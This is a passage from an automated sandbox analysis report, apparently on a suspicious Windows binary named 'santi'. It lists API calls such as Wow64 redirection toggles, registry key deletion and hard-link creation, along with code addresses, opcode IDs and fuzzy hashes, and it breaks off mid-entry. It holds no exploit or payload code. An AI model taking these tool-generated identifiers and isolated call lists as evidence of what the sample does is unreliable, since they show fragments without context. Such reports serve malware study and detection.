• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0034A15E
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0034A172
• SendMessageW.USER32(?,00001002,00000000,?), ref: 0034A196
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: 8b493181b4ea095c756072955264fe3fcda076cb4999d24c091270626d9b349f
• Instruction ID: 7b36ee9c51d80ca9a50649f41033ffa0154dace01000256e05164a1bd8c3421d
• Opcode Fuzzy Hash: 8b493181b4ea095c756072955264fe3fcda076cb4999d24c091270626d9b349f
• Instruction Fuzzy Hash: DE218D32550218ABDF128F94CC46FEA3BB9EF48754F110214FA55AB1D0D6B5BC518B90

APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0034A941
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0034A94F
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0034A956
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: a9b049686c6655f2538ad7e0471809dbea850a3ef3c5c359cb5b3bd93609bbb9
• Instruction ID: bd1c44d499b0a47263703be0b9282f4921b3319f57b11e58d08f9a59db4565f2
• Opcode Fuzzy Hash: a9b049686c6655f2538ad7e0471809dbea850a3ef3c5c359cb5b3bd93609bbb9
• Instruction Fuzzy Hash: 84218EB5640609AFDB12DF18CC91DA737EDEB5A3A4F050059FA049B2A1CB70EC118B61

APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00349A30
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00349A40
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00349A65
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: ee09968ece93faaa1a3d88ff013a1837e7db5c1a993119386217fda373a21a39
• Instruction ID: 281c7bba71e89aebec1d61f8ca3cce13e26c3e9547451ecc970e3ff8fc500934
• Opcode Fuzzy Hash: ee09968ece93faaa1a3d88ff013a1837e7db5c1a993119386217fda373a21a39
• Instruction Fuzzy Hash: 8D218032610118BFDF228F54CC85FBB3BAEEF89760F028129F9549B1A0C671AC5187A0

APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0034A46D
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0034A482
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0034A48F
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: c829f4256c5c6301305ec9bbf2cdcb530775e9b7fd83ecf350f13acafd629e7e
• Instruction ID: d174980f8fd9351e0fcade567840dcdd7a8f51814a522df0877b54dd4fa8f14f
• Opcode Fuzzy Hash: c829f4256c5c6301305ec9bbf2cdcb530775e9b7fd83ecf350f13acafd629e7e
• Instruction Fuzzy Hash: CA11E771240208BEEF225F65CC4AFAB37ADEF89754F024118FA459A291D6B2E811CB20

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00302350,?), ref: 003022A1
• GetProcAddress.KERNEL32(00000000), ref: 003022A8
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 2574300362-340411864
• Opcode ID: c4991707038256eb066efbc08009e955705f510a7febe459d2556c8a85a44c4c
• Instruction ID: 34aae42a54a7c48b904fd0823a11d9af7d9747e1bbf5b1f993be81d90111f477
• Opcode Fuzzy Hash: c4991707038256eb066efbc08009e955705f510a7febe459d2556c8a85a44c4c
• Instruction Fuzzy Hash: 65E01A78A94300ABDB935FB1EC4DB95366CAB02702F108420F102D51E0CBF54041EF05

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00302276), ref: 00302376
• GetProcAddress.KERNEL32(00000000), ref: 0030237D
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 2574300362-2819208100
• Opcode ID: ca075a36ddc3d18a4f0ca4bb22385e2849db0e39d1e80dcd6a10f33dfa4444d7
• Instruction ID: 00470eb95291fcb80f81821a3ec0aa0ecee8e730e46d050f69c18f9f34933ee6
• Opcode Fuzzy Hash: ca075a36ddc3d18a4f0ca4bb22385e2849db0e39d1e80dcd6a10f33dfa4444d7
• Instruction Fuzzy Hash: 6EE0ECB8B49300AFDB275F61ED1DB953A6CB725702F114454F10AD61F4CBFA5410DB14

Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
• Opcode ID: 6963781d925b90c7ebc5d10ccee53e0ecb0affed8936d55909facefab2237147
• Instruction ID: 92d4aaa636c9492320f39837c4568db25c7cbba205ecf051e0c71735b0270d1c
• Opcode Fuzzy Hash: 6963781d925b90c7ebc5d10ccee53e0ecb0affed8936d55909facefab2237147
• Instruction Fuzzy Hash: A3E01271804A1CDBCB139790CD05DF9B3BCA704B42F504592FD06E1420E7759B98BA22

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,003421FB,?,003423EF), ref: 00342213
• GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00342225
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetProcessId$kernel32.dll
• API String ID: 2574300362-399901964
• Opcode ID: 38a71c4514bf2836734918436c369ecc1f645c2d2fa028114e1a6c84fcba07ed
• Instruction ID: c38c72996ffeefe204195d400ee669a25c6baa99a72ede587c9a18a62e8437a3
• Opcode Fuzzy Hash: 38a71c4514bf2836734918436c369ecc1f645c2d2fa028114e1a6c84fcba07ed
• Instruction Fuzzy Hash: 33D0A734D007169FCBA34F71F80864377D8EB0A300F018819F842F2150D7F0E880C660

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,002E42EC,?,002E42AA,?), ref: 002E4304
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002E4316
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
• Opcode ID: 19f5865c7f476b8f4330cf4c79f7038ba7f48aa54588cc62d06f18a8ec9796d5
• Instruction ID: e9adc1c0707631243057a0951ef7daac519a8513a85eb9680edd5170687e1e73
• Opcode Fuzzy Hash: 19f5865c7f476b8f4330cf4c79f7038ba7f48aa54588cc62d06f18a8ec9796d5
• Instruction Fuzzy Hash: 5ED0A774D54B13AFCB625F22E80C74277D8AB05301F108459E442D2264D7F0C8808620

APIs
• LoadLibraryA.KERNEL32(kernel32.dll,002E41BB,002E4341,?,002E422F,?,002E41BB,?,?,?,?,002E39FE,?,00000001), ref: 002E4359
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002E436B
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
• Opcode ID: e4274fcc25a2d9a536e9d9663a86d36ce1a2f0bacd5a7608834361d1ecf78945
• Instruction ID: a2af1770eba6d0f061112d47f54f7e46e5e89f8acdda70339f642787357ec48b
• Opcode Fuzzy Hash: e4274fcc25a2d9a536e9d9663a86d36ce1a2f0bacd5a7608834361d1ecf78945
• Instruction Fuzzy Hash: DBD0A770D50713AFCB225F33E80CB4377D8AB11715F108559E482D2150D7F0D8808610

APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,?,0032051D,?,003205FE), ref: 00320547
• GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00320559
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1071820185
• Opcode ID: 4835462c78565b947c0b82f116fc74e5ebbde5a349c90ac5ffc90a99d41eed2f
• Instruction ID: dea1cc847f7b0c674d2873c5aac13daa1474c94cfe7c45fe2a89ed8513acdac3
• Opcode Fuzzy Hash: 4835462c78565b947c0b82f116fc74e5ebbde5a349c90ac5ffc90a99d41eed2f
• Instruction Fuzzy Hash: 5ED0A730904B22AFCB228F22F80864676E8AB02301F21C41DE447D2151D6F0CC848A50
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0032052F,?,003206D7), ref: 00320572
                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00320584
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                • API String ID: 2574300362-1587604923
                                                                • Opcode ID: 9cffb1ae5d9722666a35999ce3e1e275674f50cab49ab430ab3e444b27c3e6c0
                                                                • Instruction ID: d72591340344a7eb81b9bc2f3414e0f3878e8eaeb8f813b672fe81d5c60a9ef2
                                                                • Opcode Fuzzy Hash: 9cffb1ae5d9722666a35999ce3e1e275674f50cab49ab430ab3e444b27c3e6c0
                                                                • Instruction Fuzzy Hash: 84D05E30904B22AACB225F25B848A4277E8AF06300F218519E84692150D7F0C4C48A20
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0033ECBE,?,0033EBBB), ref: 0033ECD6
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0033ECE8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                • API String ID: 2574300362-1816364905
                                                                • Opcode ID: 1e2a82c7a419aea38b2bcd615dec5d6df6b6edce1ddfc47f8f5f2fb2ecbb61bf
                                                                • Instruction ID: 857492faf7327308c916d7f907b9401234f941aaf770413407fb43fd523c595d
                                                                • Opcode Fuzzy Hash: 1e2a82c7a419aea38b2bcd615dec5d6df6b6edce1ddfc47f8f5f2fb2ecbb61bf
                                                                • Instruction Fuzzy Hash: 65D0A730D00723AFCF235F61E88864676E8AB01700F01C519F846D2194DBF0C8818710
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0033BAD3,00000001,0033B6EE,?,0037DC00), ref: 0033BAEB
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0033BAFD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                • API String ID: 2574300362-199464113
                                                                • Opcode ID: d5003879f38ce3458d20096de51dccb62ab6179c3d24289b892b65a2d4b6e49d
                                                                • Instruction ID: d850934ae34b191459cd2069bbb1c440acf65a5d8341d1a93ac8154a049591db
                                                                • Opcode Fuzzy Hash: d5003879f38ce3458d20096de51dccb62ab6179c3d24289b892b65a2d4b6e49d
                                                                • Instruction Fuzzy Hash: A0D0A730D047139FCB335F21E888B52F6D8AB01304F018419E943D2254DBF4C880C610
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00343BD1,?,00343E06), ref: 00343BE9
                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00343BFB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                • API String ID: 2574300362-4033151799
                                                                • Opcode ID: de275b53e0ba42429a463231db3c0ccd696f1daadb453913a4d7c3bbd30ee6a4
                                                                • Instruction ID: d5b9e37c928f82ea239beb7ce93df505bf8c2780a9189adcb2f71da3434eecf2
                                                                • Opcode Fuzzy Hash: de275b53e0ba42429a463231db3c0ccd696f1daadb453913a4d7c3bbd30ee6a4
                                                                • Instruction Fuzzy Hash: 22D0A7B0A007129FDB225FA1E848A83BAFCAB02314F218419E446E3150D6F0DC808F10
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dfe8eb899833e0d557f420febd3b6d2285ce0acab2d8cb810768efaa9bbda0e3
                                                                • Instruction ID: 981b5936e8578837a7c4b3bdcac8f37f49ed92daa0cafb134ae6ce040e214b50
                                                                • Opcode Fuzzy Hash: dfe8eb899833e0d557f420febd3b6d2285ce0acab2d8cb810768efaa9bbda0e3
                                                                • Instruction Fuzzy Hash: 19C15B75A0021AEFCB19DF94C894BEEB7B9FF48700F118599E905AB251D730DE81DBA0
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0033AAB4
                                                                • CoUninitialize.OLE32 ref: 0033AABF
                                                                  • Part of subcall function 00320213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0032027B
                                                                • VariantInit.OLEAUT32(?), ref: 0033AACA
                                                                • VariantClear.OLEAUT32(?), ref: 0033AD9D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                • String ID:
                                                                • API String ID: 780911581-0
                                                                • Opcode ID: df8e3dd973e8af8a625c6e82fd40fa3542b1f9cebb8331490223b203bf88446a
                                                                • Instruction ID: 04da7c9d5fe1218b004d70d4b47707d6076e577b8b1d5757823947ac45aa50ee
                                                                • Opcode Fuzzy Hash: df8e3dd973e8af8a625c6e82fd40fa3542b1f9cebb8331490223b203bf88446a
                                                                • Instruction Fuzzy Hash: 10A15A35214B019FCB12EF15C491B1AB7E8BF88710F158459FA9A9B3A2CB30ED54CF86
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$AllocClearCopyInitString
                                                                • String ID:
                                                                • API String ID: 2808897238-0
                                                                • Opcode ID: 80409aa3bcaf015615559e334b475dd6bfbe045feb6edef0406982c2efff5e94
                                                                • Instruction ID: 1291d0c7544143ae9222ee850837f2d32b48c926b1903fca703816d0a425df29
                                                                • Opcode Fuzzy Hash: 80409aa3bcaf015615559e334b475dd6bfbe045feb6edef0406982c2efff5e94
                                                                • Instruction Fuzzy Hash: DA51B8346103069BDB299F66D4A17AEB3E9EF4C310F249C1FE556CB6D1DB7098C09B11
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                • String ID:
                                                                • API String ID: 3877424927-0
                                                                • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                • Instruction ID: ccd2632ac8a5adb8924cc094d2d1d9f298cad40dca47c8ad889e4171810a9c53
                                                                • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                • Instruction Fuzzy Hash: DC51E9B0A02309ABDB268F69C8A466E77BDEF40720F258729F835876D0D7719F50CB40
                                                                APIs
                                                                • GetWindowRect.USER32(00DF66B8,?), ref: 0034C544
                                                                • ScreenToClient.USER32(?,00000002), ref: 0034C574
                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0034C5DA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ClientMoveRectScreen
                                                                • String ID:
                                                                • API String ID: 3880355969-0
                                                                • Opcode ID: 8753af364bd409e54c417b3b59978a6c20931561b34ea5dcc89a931c1448f6a9
                                                                • Instruction ID: 86c354a8504b763d42727fec2c93b37596ee09b1b421b984d3f7460ab040cdb3
                                                                • Opcode Fuzzy Hash: 8753af364bd409e54c417b3b59978a6c20931561b34ea5dcc89a931c1448f6a9
                                                                • Instruction Fuzzy Hash: 96517B71A11208AFCF22CF69C880AAE7BF9EB45320F159259F815DB2A0D770FD41CB90
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0031C462
                                                                • __itow.LIBCMT ref: 0031C49C
                                                                  • Part of subcall function 0031C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0031C753
                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0031C505
                                                                • __itow.LIBCMT ref: 0031C55A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$__itow
                                                                • String ID:
                                                                • API String ID: 3379773720-0
                                                                • Opcode ID: b6dee00a50e5e3ed7ff391cde5c5c4a61aad1870ce6dc45c36615ef69e16ef72
                                                                • Instruction ID: 65e2cfa837ffd93207c42b223f6d72a68792b8dd023a5d1b30fc91e381ef8bef
                                                                • Opcode Fuzzy Hash: b6dee00a50e5e3ed7ff391cde5c5c4a61aad1870ce6dc45c36615ef69e16ef72
                                                                • Instruction Fuzzy Hash: 3341E431A50208AFDF26DF55C852BEE7BB9AF4D704F400019FA05A7281DB749A95CFA1
                                                                APIs
                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0032E742
                                                                • GetLastError.KERNEL32(?,00000000), ref: 0032E768
                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0032E78D
                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0032E7B9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                • String ID:
                                                                • API String ID: 3321077145-0
                                                                • Opcode ID: e53f3f77b075857f54c9d61bf84ab4e4ece5d1ece6412b83edd0be35d441fad0
                                                                • Instruction ID: 49e58db681be038f120488a5da621457f0d0788e64bf63b36a4f6d3706a2e3e0
                                                                • Opcode Fuzzy Hash: e53f3f77b075857f54c9d61bf84ab4e4ece5d1ece6412b83edd0be35d441fad0
                                                                • Instruction Fuzzy Hash: 5E414539600610DFCB12EF16C445A5DBBE5BF89710F0A8499E906AB3A2CB70FC50CF81
                                                                APIs
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0034B5D1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: InvalidateRect
                                                                • String ID:
                                                                • API String ID: 634782764-0
                                                                • Opcode ID: 19a5f28a307469c9fa51f34ddc7eee890a0985c984fa29a24329dcdeb4730f5a
                                                                • Instruction ID: 13f85f12d0bcfb8fe67efba394d5f369cacca3817ff2cade3b14bce1cede64a0
                                                                • Opcode Fuzzy Hash: 19a5f28a307469c9fa51f34ddc7eee890a0985c984fa29a24329dcdeb4730f5a
                                                                • Instruction Fuzzy Hash: 8B31DC74600208ABEB239F19CC89FA8F7E9AB06350F668151FA55DE2E1C778F9409B51
                                                                APIs
                                                                • ClientToScreen.USER32(?,?), ref: 0034D807
                                                                • GetWindowRect.USER32(?,?), ref: 0034D87D
                                                                • PtInRect.USER32(?,?,0034ED5A), ref: 0034D88D
                                                                • MessageBeep.USER32(00000000), ref: 0034D8FE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                • String ID:
                                                                • API String ID: 1352109105-0
                                                                • Opcode ID: 52958072f5e75c1f3355899ddc921e4ff5483afffb4fdb3e9d535a29a1d4116b
                                                                • Instruction ID: a12a9919702745f2bcf5f6f4bad1aff3437002c9c688b081cd3bfa401d347d43
                                                                • Opcode Fuzzy Hash: 52958072f5e75c1f3355899ddc921e4ff5483afffb4fdb3e9d535a29a1d4116b
                                                                • Instruction Fuzzy Hash: DE417470A00218EFCB13DF59D884AA9BBF9FB4A750F1981A9E815DF260D730F941CB40
                                                                APIs
                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00314038
                                                                • __isleadbyte_l.LIBCMT ref: 00314066
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00314094
                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003140CA
                                                                Memory Dump Source
